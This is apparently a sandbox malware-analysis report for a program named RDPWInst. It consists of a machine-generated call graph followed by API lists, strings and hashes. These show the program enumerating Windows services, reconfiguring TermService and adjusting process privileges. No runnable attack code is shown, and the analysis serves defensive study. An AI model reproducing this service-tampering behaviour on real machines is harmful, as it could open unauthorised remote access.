15 API calls 21666->21668 21669 40716b 21668->21669 21669->21596 21670->21599 21672 406c80 lstrcpynW LeaveCriticalSection 21671->21672 21672->21592 21673->21639 21674->21649 21675->21642 21677 406fb8 21676->21677 21678 406f55 21676->21678 21679 406344 14 API calls 21677->21679 21682 406f6d 21678->21682 21683 406fac 21678->21683 21697 406d1c 15 API calls 21678->21697 21688 406fa9 21679->21688 21680 407504 14 API calls 21680->21677 21682->21683 21684 406f86 21682->21684 21683->21680 21698 4041e4 14 API calls 21684->21698 21686 406f8e 21687 406344 14 API calls 21686->21687 21686->21688 21687->21688 21688->21655 21690 40634a 21689->21690 21692 406365 21689->21692 21690->21692 21699 4041cc 14 API calls 21690->21699 21692->21656 21693->21645 21694->21662 21695->21658 21696->21666 21697->21682 21698->21686 21699->21692 21701 409301 FindClose 21700->21701 21702 409307 21700->21702 21701->21702 21702->21602 21703 409d02 GetSystemInfo 21704 4069d4 21705 4068c4 21704->21705 21706 4069dc SysAllocStringLen 21704->21706 21709 4068d8 21705->21709 21710 4068ca SysFreeString 21705->21710 21707 406894 21706->21707 21708 4069ec SysFreeString 21706->21708 21711 4068b0 21707->21711 21712 4068a0 SysAllocStringLen 21707->21712 21710->21709 21712->21707 21712->21711 21713 40a178 21714 40a191 21713->21714 21715 40a1d2 21713->21715 21731 40493c 14 API calls 21714->21731 21717 40a19b 21732 40493c 14 API calls 21717->21732 21719 40a1a5 21733 40493c 14 API calls 21719->21733 21721 40a1af 21734 40874c DeleteCriticalSection 21721->21734 21723 40a1b4 21735 404144 21723->21735 21727 40a1be 21728 406344 14 API calls 21727->21728 21729 40a1c8 21728->21729 21730 406344 14 API calls 21729->21730 21730->21715 21731->21717 21732->21719 21733->21721 21734->21723 21736 40414d CloseHandle 21735->21736 21737 40415f 21735->21737 21736->21737 21738 40416d 21737->21738 21751 403b64 VirtualQuery Sleep Sleep VirtualAlloc MessageBoxA 21737->21751 21740 404176 VirtualFree 21738->21740 21741 40418f 21738->21741 
21740->21741 21745 4040b4 21741->21745 21744 40a15f 6 API calls 21744->21727 21746 4040d9 21745->21746 21747 4040c7 VirtualFree 21746->21747 21748 4040dd 21746->21748 21747->21746 21749 404124 VirtualFree 21748->21749 21750 40413a 21748->21750 21749->21748 21750->21744 21751->21738 21752 44373c 21753 443744 21752->21753 21753->21753 22183 40a2b0 GetModuleHandleW 21753->22183 21761 44378b 21762 407450 15 API calls 21761->21762 21763 443797 21762->21763 21764 404cdc 14 API calls 21763->21764 21765 44379c 21764->21765 21766 4042f8 14 API calls 21765->21766 21767 4437a1 21766->21767 21768 407450 15 API calls 21767->21768 21769 4437ad 21768->21769 21770 404cdc 14 API calls 21769->21770 21771 4437b2 21770->21771 21772 4042f8 14 API calls 21771->21772 21773 4437b7 21772->21773 21774 407450 15 API calls 21773->21774 21775 4437c0 21774->21775 21776 404cdc 14 API calls 21775->21776 21777 4437c5 21776->21777 21778 4042f8 14 API calls 21777->21778 21779 4437ca 21778->21779 22209 404504 GetCommandLineW 21779->22209 21781 4437cf 21782 443876 21781->21782 22214 404564 21781->22214 21784 407450 15 API calls 21782->21784 21786 443882 21784->21786 21788 404cdc 14 API calls 21786->21788 21789 443887 21788->21789 21791 4042f8 14 API calls 21789->21791 21790 4437f0 21792 44396a 21790->21792 21795 404564 17 API calls 21790->21795 21794 44388c 21791->21794 21793 404564 17 API calls 21792->21793 21796 443977 21793->21796 21797 407450 15 API calls 21794->21797 21798 443803 21795->21798 21799 4072a4 15 API calls 21796->21799 21800 443898 21797->21800 21801 4072a4 15 API calls 21798->21801 21802 443984 21799->21802 21803 404cdc 14 API calls 21800->21803 21804 443810 21801->21804 21805 443986 21802->21805 21806 4439ac 21802->21806 21807 44389d 21803->21807 21804->21792 21810 404564 17 API calls 21804->21810 22938 43cea4 21805->22938 21814 4439bc 21806->21814 21815 4439ed 21806->21815 21809 4042f8 14 API calls 21807->21809 21812 4438a2 21809->21812 21813 443823 21810->21813 21811 443993 21817 
407450 15 API calls 21811->21817 21818 407450 15 API calls 21812->21818 21816 4072a4 15 API calls 21813->21816 21819 407450 15 API calls 21814->21819 22233 43a644 GetNativeSystemInfo 21815->22233 21820 443830 21816->21820 21821 44399d 21817->21821 21822 4438ab 21818->21822 21824 4439c8 21819->21824 21820->21792 21831 404564 17 API calls 21820->21831 21825 404cdc 14 API calls 21821->21825 21826 404cdc 14 API calls 21822->21826 21830 404cdc 14 API calls 21824->21830 21832 4439a2 21825->21832 21833 4438b0 21826->21833 21828 4439f6 21834 407450 15 API calls 21828->21834 21829 443a11 22235 43a7bc 21829->22235 21835 4439cd 21830->21835 21836 443843 21831->21836 21838 4042f8 14 API calls 21832->21838 21839 4042f8 14 API calls 21833->21839 21840 443a02 21834->21840 21841 4042f8 14 API calls 21835->21841 21842 4072a4 15 API calls 21836->21842 21849 443965 21838->21849 21844 4438b5 21839->21844 21845 404cdc 14 API calls 21840->21845 21846 4439d2 21841->21846 21847 443850 21842->21847 21843 443a16 21848 404564 17 API calls 21843->21848 21850 407450 15 API calls 21844->21850 21852 443a07 21845->21852 21853 407450 15 API calls 21846->21853 21847->21792 21858 404564 17 API calls 21847->21858 21854 443a23 21848->21854 21851 4438c1 21850->21851 21855 404cdc 14 API calls 21851->21855 21856 4042f8 14 API calls 21852->21856 21857 4439de 21853->21857 21859 4072a4 15 API calls 21854->21859 21860 4438c6 21855->21860 21856->21849 21861 404cdc 14 API calls 21857->21861 21862 443863 21858->21862 21863 443a30 21859->21863 21864 4042f8 14 API calls 21860->21864 21865 4439e3 21861->21865 21866 4072a4 15 API calls 21862->21866 21867 443cc4 21863->21867 21872 443a5f 21863->21872 21873 407450 15 API calls 21863->21873 21868 4438cb 21864->21868 21870 4042f8 14 API calls 21865->21870 21871 443870 21866->21871 21869 404564 17 API calls 21867->21869 21874 407450 15 API calls 21868->21874 21875 443cd1 21869->21875 21870->21849 21871->21782 21871->21792 21876 407450 15 API calls 21872->21876 21877 
443a4b 21873->21877 21878 4438d7 21874->21878 21879 4072a4 15 API calls 21875->21879 21880 443a6b 21876->21880 21881 404cdc 14 API calls 21877->21881 21882 404cdc 14 API calls 21878->21882 21883 443cde 21879->21883 21884 404cdc 14 API calls 21880->21884 21885 443a50 21881->21885 21886 4438dc 21882->21886 21887 443e6b 21883->21887 21892 443d0d 21883->21892 21898 407450 15 API calls 21883->21898 21888 443a70 21884->21888 21890 4042f8 14 API calls 21885->21890 21891 4042f8 14 API calls 21886->21891 21889 404564 17 API calls 21887->21889 21893 4042f8 14 API calls 21888->21893 21894 443e78 21889->21894 21896 443a55 21890->21896 21897 4438e1 21891->21897 21895 407450 15 API calls 21892->21895 21899 443a75 21893->21899 21900 4072a4 15 API calls 21894->21900 21901 443d19 21895->21901 22942 40632c 10 API calls 21896->22942 21903 407450 15 API calls 21897->21903 21904 443cf9 21898->21904 21905 407450 15 API calls 21899->21905 21906 443e85 21900->21906 21907 404cdc 14 API calls 21901->21907 21908 4438ed 21903->21908 21909 404cdc 14 API calls 21904->21909 21910 443a81 21905->21910 21912 443ecb 21906->21912 21918 443eb0 21906->21918 21919 443e90 21906->21919 21913 443d1e 21907->21913 21914 404cdc 14 API calls 21908->21914 21915 443cfe 21909->21915 21911 404cdc 14 API calls 21910->21911 21917 443a86 21911->21917 21921 404564 17 API calls 21912->21921 21920 4042f8 14 API calls 21913->21920 21922 4438f2 21914->21922 21916 4042f8 14 API calls 21915->21916 21923 443d03 21916->21923 21925 4042f8 14 API calls 21917->21925 21924 407450 15 API calls 21918->21924 21926 407450 15 API calls 21919->21926 21927 443d23 21920->21927 21928 443ed8 21921->21928 21929 4042f8 14 API calls 21922->21929 22944 40632c 10 API calls 21923->22944 21932 443ebc 21924->21932 21933 443a8b 21925->21933 21934 443e9c 21926->21934 21935 443d31 21927->21935 21936 443d2c 21927->21936 21937 4072a4 15 API calls 21928->21937 21930 4438f7 21929->21930 21938 407450 15 API calls 21930->21938 21939 404cdc 14 API calls 
21932->21939 21940 407450 15 API calls 21933->21940 21941 404cdc 14 API calls 21934->21941 21944 43b7d4 52 API calls 21935->21944 21942 43a688 18 API calls 21936->21942 21943 443ee5 21937->21943 21945 443903 21938->21945 21946 443ec1 21939->21946 21947 443a97 21940->21947 21948 443ea1 21941->21948 21942->21935 21943->21849 21949 443eeb 21943->21949 21950 443d36 21944->21950 21951 404cdc 14 API calls 21945->21951 21952 4042f8 14 API calls 21946->21952 21953 404cdc 14 API calls 21947->21953 21954 4042f8 14 API calls 21948->21954 21955 407450 15 API calls 21949->21955 21956 407450 15 API calls 21950->21956 21958 443908 21951->21958 21959 443ec6 21952->21959 21960 443a9c 21953->21960 21961 443ea6 21954->21961 21962 443ef7 21955->21962 21957 443d42 21956->21957 21964 404cdc 14 API calls 21957->21964 21965 4042f8 14 API calls 21958->21965 22949 43f7a4 129 API calls 21959->22949 21967 4042f8 14 API calls 21960->21967 22948 40632c 10 API calls 21961->22948 21963 404cdc 14 API calls 21962->21963 21969 443efc 21963->21969 21970 443d47 21964->21970 21971 44390d 21965->21971 21972 443aa1 21967->21972 21973 4042f8 14 API calls 21969->21973 21974 4042f8 14 API calls 21970->21974 21975 407450 15 API calls 21971->21975 21976 407450 15 API calls 21972->21976 21977 443f01 21973->21977 21978 443d4c 21974->21978 21979 443919 21975->21979 21980 443aad 21976->21980 21981 43b7d4 52 API calls 21977->21981 22945 43c9b4 77 API calls 21978->22945 21983 404cdc 14 API calls 21979->21983 21984 404cdc 14 API calls 21980->21984 21985 443f06 21981->21985 21987 44391e 21983->21987 21988 443ab2 21984->21988 21989 407450 15 API calls 21985->21989 21986 443d51 21990 407450 15 API calls 21986->21990 21991 4042f8 14 API calls 21987->21991 21992 4042f8 14 API calls 21988->21992 21993 443f12 21989->21993 21994 443d5d 21990->21994 21995 443923 21991->21995 21996 443ab7 21992->21996 21998 404cdc 14 API calls 21993->21998 21999 404cdc 14 API calls 21994->21999 22000 407450 15 API calls 21995->22000 21997 
407450 15 API calls 21996->21997 22001 443ac3 21997->22001 22002 443f17 21998->22002 22003 443d62 21999->22003 22004 44392f 22000->22004 22005 404cdc 14 API calls 22001->22005 22006 4042f8 14 API calls 22002->22006 22007 4042f8 14 API calls 22003->22007 22008 404cdc 14 API calls 22004->22008 22010 443ac8 22005->22010 22011 443f1c 22006->22011 22012 443d67 22007->22012 22009 443934 22008->22009 22013 4042f8 14 API calls 22009->22013 22014 4042f8 14 API calls 22010->22014 22015 43bf00 23 API calls 22011->22015 22016 43bf00 23 API calls 22012->22016 22017 443939 22013->22017 22018 443acd 22014->22018 22019 443f26 22015->22019 22020 443d71 22016->22020 22021 407450 15 API calls 22017->22021 22022 407450 15 API calls 22018->22022 22023 43c1c8 21 API calls 22019->22023 22024 43c1c8 21 API calls 22020->22024 22026 443945 22021->22026 22027 443ad9 22022->22027 22028 443f30 Sleep 22023->22028 22025 443d7b Sleep 22024->22025 22029 407450 15 API calls 22025->22029 22030 404cdc 14 API calls 22026->22030 22031 404cdc 14 API calls 22027->22031 22051 443f44 22028->22051 22032 443d91 22029->22032 22033 44394a 22030->22033 22034 443ade 22031->22034 22036 404cdc 14 API calls 22032->22036 22037 4042f8 14 API calls 22033->22037 22038 4042f8 14 API calls 22034->22038 22035 443f6d Sleep 22041 43b58c 27 API calls 22035->22041 22039 443d96 22036->22039 22040 44394f 22037->22040 22042 443ae3 22038->22042 22043 4042f8 14 API calls 22039->22043 22044 407450 15 API calls 22040->22044 22045 443f81 22041->22045 22046 407450 15 API calls 22042->22046 22047 443d9b 22043->22047 22048 44395b 22044->22048 22049 407450 15 API calls 22045->22049 22050 443aef 22046->22050 22946 43d938 24 API calls 22047->22946 22053 404cdc 14 API calls 22048->22053 22054 443f8d 22049->22054 22055 404cdc 14 API calls 22050->22055 22051->22035 22056 43b58c 27 API calls 22051->22056 22057 443960 22053->22057 22058 404cdc 14 API calls 22054->22058 22059 443af4 22055->22059 22056->22051 22061 4042f8 14 API calls 
22057->22061 22062 443f92 22058->22062 22060 4042f8 14 API calls 22059->22060 22064 443af9 22060->22064 22061->21849 22063 4042f8 14 API calls 22062->22063 22063->21849 22065 404564 17 API calls 22064->22065 22067 443b06 22065->22067 22066 443dd3 Sleep 22068 43b58c 27 API calls 22066->22068 22069 4072a4 15 API calls 22067->22069 22070 443de7 Sleep 22068->22070 22071 443b13 22069->22071 22072 404564 17 API calls 22070->22072 22074 443b15 22071->22074 22075 443b26 22071->22075 22076 443dfe 22072->22076 22073 443da0 22073->22066 22077 43b58c 27 API calls 22073->22077 22078 406bf0 15 API calls 22074->22078 22080 406bf0 15 API calls 22075->22080 22079 4072a4 15 API calls 22076->22079 22077->22073 22081 443b24 22078->22081 22082 443e0b 22079->22082 22080->22081 22084 443b43 22081->22084 22329 43a688 GetModuleHandleW 22081->22329 22083 443e47 22082->22083 22086 407450 15 API calls 22082->22086 22085 443e55 22083->22085 22947 43a724 18 API calls 22083->22947 22334 43de78 22084->22334 22092 407450 15 API calls 22085->22092 22091 443e19 22086->22091 22089 443b48 22433 43b7d4 22089->22433 22094 404cdc 14 API calls 22091->22094 22095 443e61 22092->22095 22097 443e1e 22094->22097 22098 404cdc 14 API calls 22095->22098 22101 4042f8 14 API calls 22097->22101 22099 443e66 22098->22099 22102 4042f8 14 API calls 22099->22102 22100 407450 15 API calls 22103 443b59 22100->22103 22104 443e23 22101->22104 22102->21887 22106 404cdc 14 API calls 22103->22106 22105 43e864 85 API calls 22104->22105 22107 443e2a 22105->22107 22108 443b5e 22106->22108 22109 407450 15 API calls 22107->22109 22110 4042f8 14 API calls 22108->22110 22111 443e36 22109->22111 22112 443b63 22110->22112 22113 404cdc 14 API calls 22111->22113 22114 404564 17 API calls 22112->22114 22115 443e3b 22113->22115 22116 443b70 22114->22116 22117 4042f8 14 API calls 22115->22117 22118 4072a4 15 API calls 22116->22118 22119 443e40 22117->22119 22120 443b7d 22118->22120 22121 43f310 21 API calls 22119->22121 22122 443b99 
22120->22122 22123 404564 17 API calls 22120->22123 22121->22083 22502 43d0f8 22122->22502 22125 443b8c 22123->22125 22126 4072a4 15 API calls 22125->22126 22126->22122 22127 443bab 22128 407450 15 API calls 22127->22128 22129 443bb7 22128->22129 22130 404cdc 14 API calls 22129->22130 22131 443bbc 22130->22131 22132 4042f8 14 API calls 22131->22132 22133 443bc1 22132->22133 22652 43c598 22133->22652 22135 443bc6 22136 407450 15 API calls 22135->22136 22137 443bd2 22136->22137 22138 404cdc 14 API calls 22137->22138 22139 443bd7 22138->22139 22140 4042f8 14 API calls 22139->22140 22141 443bdc 22140->22141 22685 43e7dc 22141->22685 22144 407450 15 API calls 22145 443bed 22144->22145 22146 404cdc 14 API calls 22145->22146 22147 443bf2 22146->22147 22148 4042f8 14 API calls 22147->22148 22149 443bf7 22148->22149 22694 43bf00 22149->22694 22151 443c01 22731 43c1c8 OpenProcess 22151->22731 22153 443c0b Sleep 22158 443c1f 22153->22158 22154 443c48 Sleep 22758 43b58c 22154->22758 22156 443c5c Sleep 22157 407450 15 API calls 22156->22157 22159 443c72 22157->22159 22158->22154 22160 43b58c 27 API calls 22158->22160 22161 404cdc 14 API calls 22159->22161 22160->22158 22162 443c77 22161->22162 22163 4042f8 14 API calls 22162->22163 22164 443c7c 22163->22164 22786 43e864 22164->22786 22166 443c83 22167 407450 15 API calls 22166->22167 22168 443c8f 22167->22168 22169 404cdc 14 API calls 22168->22169 22170 443c94 22169->22170 22171 4042f8 14 API calls 22170->22171 22172 443c99 22171->22172 22931 43f310 22172->22931 22174 443ca0 22175 407450 15 API calls 22174->22175 22176 443cac 22175->22176 22177 404cdc 14 API calls 22176->22177 22178 443cb1 22177->22178 22179 4042f8 14 API calls 22178->22179 22180 443cb6 22179->22180 22180->21867 22181 443cbf 22180->22181 22943 43a724 18 API calls 22181->22943 22184 40a2eb 22183->22184 22950 405f98 22184->22950 22187 407450 22188 407473 22187->22188 22995 406824 22188->22995 22193 404cdc 22194 404d02 22193->22194 22195 404ce7 22193->22195 22197 
404be8 14 API calls 22194->22197 22196 404be8 14 API calls 22195->22196 22198 404cfe 22196->22198 22197->22198 23038 404930 22198->23038 22201 4042f8 23048 40a264 14 API calls 22201->23048 22203 40430c 22203->21761 22204 4042a0 22204->22203 22205 4042c5 22204->22205 23046 40a264 14 API calls 22204->23046 23047 404294 10 API calls 22205->23047 22208 4042e6 22208->21761 23049 404448 22209->23049 22211 404448 15 API calls 22212 404528 22211->22212 22212->22211 22213 40453f 22212->22213 22213->21781 22215 406bf0 15 API calls 22214->22215 22216 40457a 22215->22216 22217 40459c GetCommandLineW 22216->22217 22218 40457e GetModuleFileNameW 22216->22218 22223 4045a3 22217->22223 23053 406d2c 22218->23053 22221 404448 15 API calls 22221->22223 22222 4045ba 22224 4072a4 22222->22224 22223->22221 22223->22222 22225 4072a8 22224->22225 22228 4072b8 22224->22228 22225->22228 23058 406d1c 15 API calls 22225->23058 22227 4072f2 22229 4072a4 15 API calls 22227->22229 22228->21790 22230 4072fb 22229->22230 23059 4041cc 14 API calls 22230->23059 22232 407306 22232->21790 22234 43a657 22233->22234 22234->21828 22234->21829 22236 43a7e1 22235->22236 22237 43a7f6 22235->22237 23121 4387ec 18 API calls 22236->23121 23122 4387a8 18 API calls 22237->23122 22240 43a7f2 23060 438890 22240->23060 22244 43a81c 22245 43a863 22244->22245 22248 43a827 GetLastError 22244->22248 23093 439408 22245->23093 22250 407450 15 API calls 22248->22250 22252 43a843 22250->22252 23123 407dec 22252->23123 22256 407450 15 API calls 22257 43a852 22256->22257 22260 404cdc 14 API calls 22257->22260 22258 43a906 22262 438b0c 20 API calls 22258->22262 22259 43a884 22259->22258 22263 40e50c 15 API calls 22259->22263 22261 43a857 22260->22261 22264 4042f8 14 API calls 22261->22264 22265 43a912 22262->22265 22270 43a8a0 22263->22270 22266 43a85c 22264->22266 22267 43a959 22265->22267 22272 43a91d GetLastError 22265->22272 23127 40632c 10 API calls 22266->23127 22269 439408 71 API calls 22267->22269 22271 43a968 
22269->22271 22270->22258 22277 407450 15 API calls 22270->22277 22273 406bf0 15 API calls 22271->22273 22274 407450 15 API calls 22272->22274 22275 43a975 22273->22275 22276 43a939 22274->22276 22278 438860 17 API calls 22275->22278 22279 407dec 14 API calls 22276->22279 22280 43a8c7 22277->22280 22281 43a97c 22278->22281 22282 43a93e 22279->22282 22284 404cdc 14 API calls 22280->22284 22285 40e50c 15 API calls 22281->22285 22283 407450 15 API calls 22282->22283 22286 43a948 22283->22286 22287 43a8cc 22284->22287 22293 43a989 22285->22293 22288 404cdc 14 API calls 22286->22288 22289 4042f8 14 API calls 22287->22289 22290 43a94d 22288->22290 22291 43a8d1 22289->22291 22294 4042f8 14 API calls 22290->22294 22295 407450 15 API calls 22291->22295 22292 43aa10 22301 40e50c 15 API calls 22292->22301 22293->22292 22296 40e50c 15 API calls 22293->22296 22297 43a952 22294->22297 22298 43a8e0 22295->22298 22305 43a9a7 22296->22305 23129 40632c 10 API calls 22297->23129 22300 407450 15 API calls 22298->22300 22302 43a8e8 22300->22302 22307 43aa24 22301->22307 22303 407450 15 API calls 22302->22303 22304 43a8f2 22303->22304 22306 404cdc 14 API calls 22304->22306 22305->22292 22310 407450 15 API calls 22305->22310 22308 43a8f7 22306->22308 22307->21843 22309 4042f8 14 API calls 22308->22309 22311 43a8fc 22309->22311 22312 43a9ce 22310->22312 23128 40632c 10 API calls 22311->23128 22314 404cdc 14 API calls 22312->22314 22315 43a9d3 22314->22315 22316 4042f8 14 API calls 22315->22316 22317 43a9d8 22316->22317 22318 407450 15 API calls 22317->22318 22319 43a9e7 22318->22319 22320 407450 15 API calls 22319->22320 22321 43a9f2 22320->22321 22322 407450 15 API calls 22321->22322 22323 43a9fc 22322->22323 22324 404cdc 14 API calls 22323->22324 22325 43aa01 22324->22325 22326 4042f8 14 API calls 22325->22326 22327 43aa06 22326->22327 23130 40632c 10 API calls 22327->23130 22330 43a6bf 22329->22330 22331 43a69e 22329->22331 22330->22084 23172 40aa94 17 API calls 22331->23172 22333 
43a6a9 22333->22330 23173 43c45c 22334->23173 22336 43deae 23183 43dc64 22336->23183 22341 407450 15 API calls 22342 43df08 22341->22342 22343 407450 15 API calls 22342->22343 22344 43df10 22343->22344 22345 404cdc 14 API calls 22344->22345 22346 43df15 22345->22346 22347 4042f8 14 API calls 22346->22347 22348 43df1a 22347->22348 22349 43dfaa 22348->22349 22350 43df2b 22348->22350 22351 43dfb7 22349->22351 22367 43e004 22349->22367 22353 43df7f 22350->22353 22355 407450 15 API calls 22350->22355 22354 43dfd9 22351->22354 22356 407450 15 API calls 22351->22356 22352 43e060 22357 43cea4 73 API calls 22352->22357 22359 407450 15 API calls 22353->22359 22365 43dfa5 22353->22365 22363 407450 15 API calls 22354->22363 22354->22365 22358 43df43 22355->22358 22360 43dfcf 22356->22360 22361 43e07c 22357->22361 22362 404cdc 14 API calls 22358->22362 22364 43df9b 22359->22364 22366 404cdc 14 API calls 22360->22366 23193 407184 15 API calls 22361->23193 22369 43df48 22362->22369 22370 43dff5 22363->22370 22371 404cdc 14 API calls 22364->22371 22365->22089 22372 43dfd4 22366->22372 22367->22352 22373 407450 15 API calls 22367->22373 22374 4042f8 14 API calls 22369->22374 22375 404cdc 14 API calls 22370->22375 22376 43dfa0 22371->22376 22377 4042f8 14 API calls 22372->22377 22378 43e03d 22373->22378 22379 43df4d 22374->22379 22380 43dffa 22375->22380 22381 4042f8 14 API calls 22376->22381 22377->22354 22382 404cdc 14 API calls 22378->22382 22383 407450 15 API calls 22379->22383 22384 4042f8 14 API calls 22380->22384 22381->22365 22385 43e042 22382->22385 22387 43df5c 22383->22387 22384->22365 22388 4042f8 14 API calls 22385->22388 22391 404cdc 14 API calls 22387->22391 22393 43e047 22388->22393 22396 43df61 22391->22396 22399 407450 15 API calls 22393->22399 22400 4042f8 14 API calls 22396->22400 22405 43e056 22399->22405 22401 43df66 22400->22401 22406 407450 15 API calls 22401->22406 22410 404cdc 14 API calls 22405->22410 22411 43df75 22406->22411 22415 43e05b 22410->22415 
                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                                              • GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B953
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B95D
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B962
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseErrorHandleLastService$EnumServicesStatus$ManagerOpen
                                                                                                              • String ID: $sD$ServicesActive$TermService$[*] No shared services found.$[*] Shared services found: $[+] TermService found (pid $[-] EnumServicesStatusEx error (code $[-] Failed to set up TermService. Unknown error.$[-] OpenSCManager error (code $[-] TermService not found.
                                                                                                              • API String ID: 2770857348-2470772499
                                                                                                              • Opcode ID: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                                              • Instruction ID: fb74497bf6b161f68451673f63bd6f491a4d1cb4b87c09a1aee9fb4a9c308b37
                                                                                                              • Opcode Fuzzy Hash: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                                              • Instruction Fuzzy Hash: A1C15074A041049BD710FBB9DD42B5E76A5EB89308F11507FF640BB292CB3CAD058BAE

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B1FE
                                                                                                              • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B209
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000), ref: 0043B24F
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B25B
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B260
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                                              • String ID: $sD$...$ServicesActive$[*] Configuring $[-] ChangeServiceConfig error (code $[-] OpenSCManager error (code $[-] OpenService error (code
                                                                                                              • API String ID: 48634454-398082305
                                                                                                              • Opcode ID: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                                              • Instruction ID: ec3001641675e227f0f71ffcc16d431bf32a474d6a16b1f18b89db5f0a2815a5
                                                                                                              • Opcode Fuzzy Hash: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                                              • Instruction Fuzzy Hash: 32318DA4708210AAE611B7B68D43B2F6598DF8D308F12917BB614A6693CB3C9D0195BF

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                                              • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043BFA6
                                                                                                              • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BFAF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
